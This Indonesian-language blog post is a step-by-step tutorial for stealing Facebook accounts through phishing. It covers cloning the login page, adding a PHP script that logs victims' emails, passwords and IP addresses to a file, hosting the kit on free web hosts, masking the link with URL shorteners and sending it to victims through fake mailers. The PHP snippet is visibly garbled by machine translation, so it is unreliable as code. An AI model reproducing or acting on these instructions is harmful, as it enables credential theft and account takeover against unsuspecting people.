Twitter


Cara hack account facebook dengan phishing



Facebook phishing adalah cara yang paling umum dan paling mudah kita bisa hack akun facebook.di phishing, kami mengirim korban halaman login palsu facebook yang identik dengan yang nyata, jika korban tidak melihat dan memasuki rincian mereka pada halaman palsu rinciannya akan dikirim ke kami. Jadi di sini, saya akan menunjukkan kepada sobat bagaimana untuk melakukannya langkah demi langkah ddengan secara detail.

Oke jadi mari kita mulai dengan langkah pertama.

 
Pertama-tama Anda harus membuat account di:


www.000webhost.com
 
www.my3gb.com 
www.phpnet.us


atau web gratis lainnya layanan hosting dengan dukungan php.
Setelah mendaftar account di sana atau kalo sobat sudah memiliki account, kemudian ikuti langkah-langkah ini,


Pergi ke halaman login facebook dan menyimpan halaman ke dekstop sobat. Kalo sobat menyimpan halaman dengan benar sobat harus mendapatkan 1 file HTML dan 1 Folder terkait untuk itu. Sekarang buka file HTML dengan editor teks seperti notepad, dan mencari tindakan string = "https://www.facebook.com/login.php?login_attempt=1"sekarang mengubah URL tindakan untuk "post.php" seperti tindakan ini = "post.php" sekarang menyimpan file. mengubah nama sebagai "index.html"daripada buka notepad dan paste kode php ini:


<? Php$ User = $ _POST ['email']; 

$ Lulus = $ _POST ['lulus']; 
$ Ip = $ _SERVER ['REMOTE_ADDR']; 
$ File = fopen ('pass.html', 'a'); 

$ Data = "<b> Email atau Nama Pengguna: </ b>".. $ User "<br/> <b> Password: </ b>". $ Pass "<br/> Alamat IP <b>.: </ b> ".. $ ip" <br/> <hr/> <br/> "; 
$ Tulis = fwrite ($ file, $ data); 
header ('location: http://facebook.com/me');?> 

menyimpannya sebagai "post.php" ingat, bukan "post.php.txt", "post.php" nya, sekarang sobat harus punya 2 file dan folder 1.sekarang kompres semua itu ke file ZIP yang disebut "fb.zip" atau apa yang pernah nama yang sobat inginkan.


Catatan: Anda dapat mengkompres file menggunakan WinRAR, pilih file klik kiri dan pilih "Add to archive", simpan sebagai anything.zip
Sekarang kembali ke host Web sobat. Pergi ke Control Panel >> File Manager dan upload "fb.zip" file yang sobat download ke direktori root dan ekstrak, Kalo sobat tidak tahu bagaimana untuk meng-upload file ke server web menyebutkan di bawah ini dalam komentar atau hanya menonton dari youtube.


Sekarang melihat apakah ia bekerja atau tidak. ketik http://your-subdomain.tld/index.html Jika hal itu menunjukkan halaman login facebook, itu berarti Anda telah melakukan dengan benar.


ketika login korban, Anda dapat melihat password mereka di http://your-subdomain.tld/pass.html


Sekarang salin link dari halaman login palsu, mengubah url menggunakan shortner url seperti:


www.tiny.cc 

www.goo.gl 
www.tinyurl.com 
www.shadyurl.com

dan mengirimkannya ke korban menggunakan mailer palsu atau hanya memberikan link. google untuk menemukan bebas palsu mailer :)


SELAMAT MENCOBA YA SOBAT   ^_^

Tidak ada komentar: